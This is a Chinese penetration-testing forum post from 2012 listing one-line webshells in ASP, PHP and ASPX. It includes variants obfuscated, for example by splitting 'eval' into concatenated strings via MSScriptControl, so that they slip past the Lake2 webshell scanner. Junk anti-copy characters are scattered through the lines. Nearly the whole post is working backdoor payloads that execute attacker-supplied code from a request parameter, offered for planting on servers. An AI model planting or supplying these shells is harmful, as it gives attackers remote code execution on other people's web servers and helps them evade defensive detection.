中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  
( v% `2 k' ~7 F8 S
% z6 E* B( N1 ^. Fphp一句话  <?php eval($_POST[1]);?>  : J1 Q$ O; L% W6 N' }3 B
4 K8 r0 m" Z& `' y
aspx一句话
, {/ `; o- G( f2 g* i* Q1 n, C$ y% v+ w# B9 S( b
<script language="C#" runat="server">& ?# J+ g' ]+ u/ X0 K* O: h5 v

& p+ n0 z& H" `1 lWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");3 F& ]1 d9 j. y1 Z- x, V9 g: f

' C; s- b+ u. l, v</script>
0 ?8 B2 o  q6 C4 s- A9 ^. [$ i3 [: N3 I5 |; o
可以躲过雷客图的一句话。
( ^$ b( A" N. E- c/ L8 j4 _
; Y4 M# T0 x2 \" @/ P3 }2 R) h  <%
5 H7 l: S/ Y7 M9 O; }/ y8 b1 H8 d. C/ V* H# S
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
0 }5 @8 W8 F: Z1 W$ i: U* L- v2 U* P2 |
  ms.Language="VBScript"
5 [7 Q% D3 H* y; [# g
/ _$ |' k8 j9 X* ~7 a5 e  ms.AddObject "Response", Response  N1 w" Y6 o( I0 B' \

2 F" J) X: f5 l( h3 J7 Q! j  ms.AddObject "request", request
. w- ?# G; j8 N% L6 S% W, a# W: z5 y' a
  ms.ExecuteStatement("ev"&"al(request(""1""))")
/ @- I5 G) c! P+ _& Z! D9 u* |. m# g2 e! N; O( u
  %># v0 ^) S, J6 P& R- y
# \, Q( ^# D6 Y3 t
  不用'<,>'的asp一句话2 s' W; ?4 q4 P' L+ x( @, b9 [
4 ?/ R& p$ K, x8 d& A8 G
  <script language=VBScript runat=server>execute request("1")</script>
. j; v* W, T4 w: T
' J3 C2 s' V$ v$ }  不用双引号的一句话。# @: ]  N% d( k9 O+ n- d/ V) t
' s2 i) p: h4 q/ {2 K
  <%eval request(chr(35))%>! L( N( i; n9 C6 D5 `4 E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2